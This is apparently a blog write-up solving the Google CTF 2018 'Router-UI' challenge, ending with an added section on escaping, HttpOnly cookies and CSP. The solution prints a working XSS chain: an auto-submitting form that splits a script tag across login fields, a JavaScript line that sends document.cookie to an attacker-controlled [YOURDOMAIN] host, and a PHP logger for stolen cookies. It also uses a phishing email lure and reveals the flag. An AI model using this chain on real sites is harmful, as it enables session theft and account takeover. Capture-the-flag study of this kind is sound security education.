Router-UI | Google CTF 2018

Posted on March 23, 2019 by Yılmaz Cemalettin

Google CTF 2018

Router-UI

Using the domain found on the hardened aluminum key, you make your way on to the OffHub router. A revolutionary device that simplifies your life. You’re at the UI page, but attempting to brute force the password failed miserably. If we could find an XSS on the page then we could use it to steal the root user session token. In case you find something, try to send an email to wintermuted@googlegroups.com. If you claim your link includes cat pictures, I’m sure Wintermuted will click it. I hope Chrome’s XSS filter will not block the exploit though.

https://router-ui.web.ctfcompetition.com/

You can find all my CTF solutions here.


XSS stands for cross-site scripting, which gives us a clue about the website's weakness.

When we open the website, we encounter the window below.

Try with:

username: test

password: testpassword

Output is:

We can use this POST request.

I wrote some scripts for the XSS vulnerability.

But your domain must have an SSL certificate. Because Google Chrome blocks http:// requests, your domain must be served over https://.

badlogin.html

<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Cats</title>
</head>
<body>
<form method="POST" action="https://router-ui.web.ctfcompetition.com/login">
<input name="username" value="&lt;script src=https:">
<input name="password" value="[YOURDOMAIN].com/badjs.js&gt;&lt;/script&gt;">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

 

badphp.php

<?php
file_put_contents('logbad.txt',$_SERVER['REQUEST_URI'].PHP_EOL,FILE_APPEND);
die;

 

badjs.js

window.location.href='https://[YOURDOMAIN].com/badphp.php?'+document.cookie;

After that, I sent an e-mail to wintermuted@googlegroups.com:

“Please visit https://www.[YOURDOMAIN].com/badlogin.html for cat picture”

After 1 min, I checked logbad.txt and found the session cookie.

/badphp.php?flag=Try%20the%20session%20cookie;%20session=Avaev8thDieM6Quauoh2TuDeaez9Weja

I added this cookie in Chrome.

When I reloaded the page, I was logged in to the website. When I opened the password value with the inspector, I found the flag.

 

<input type="password" value="CTF{Kao4pheitot7Ahmu}">

CTF{Kao4pheitot7Ahmu}
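
The fix for the weakness used above, as an added example that is not part of the original post or the challenge's code: the reflected login fields rendered unsafely and then HTML-encoded, plus response headers that keep a session cookie out of reach of document.cookie. The "Wrong credentials" markup, the "//" separator and all function names are assumptions; the sample input is the pair of field values from badlogin.html.

```javascript
// Added defensive example. The "Wrong credentials" markup, the "//" separator
// and every function name here are assumptions, not the challenge's real code.

const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that can open a tag or close an attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Vulnerable pattern: both POST fields are pasted into the page unchanged, so
// markup split across username and password is joined again by the server.
function renderLoginErrorUnsafe(username, password) {
  return `<p>Wrong credentials: ${username}//${password}</p>`;
}

// Hardened pattern: each reflected value is encoded for the HTML text context.
// (Not echoing the password at all would be better still.)
function renderLoginErrorSafe(username, password) {
  return `<p>Wrong credentials: ${escapeHtml(username)}//${escapeHtml(password)}</p>`;
}

// Defence in depth: HttpOnly hides the session cookie from document.cookie,
// and the CSP refuses inline scripts and scripts loaded from any other origin.
function hardenedHeaders(sessionToken) {
  return {
    'Set-Cookie': `session=${sessionToken}; HttpOnly; Secure; SameSite=Strict; Path=/`,
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
  };
}

// The two field values from badlogin.html above, used as sample input.
const SAMPLE = {
  username: '<script src=https:',
  password: '[YOURDOMAIN].com/badjs.js></script>',
};

console.log(renderLoginErrorUnsafe(SAMPLE.username, SAMPLE.password));
console.log(renderLoginErrorSafe(SAMPLE.username, SAMPLE.password));
console.log(hardenedHeaders('constructed-token'));
```

With the encoded version the browser displays the submitted text instead of parsing it as a tag, and with HttpOnly set the cookie string read by badjs.js would not contain the session value.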
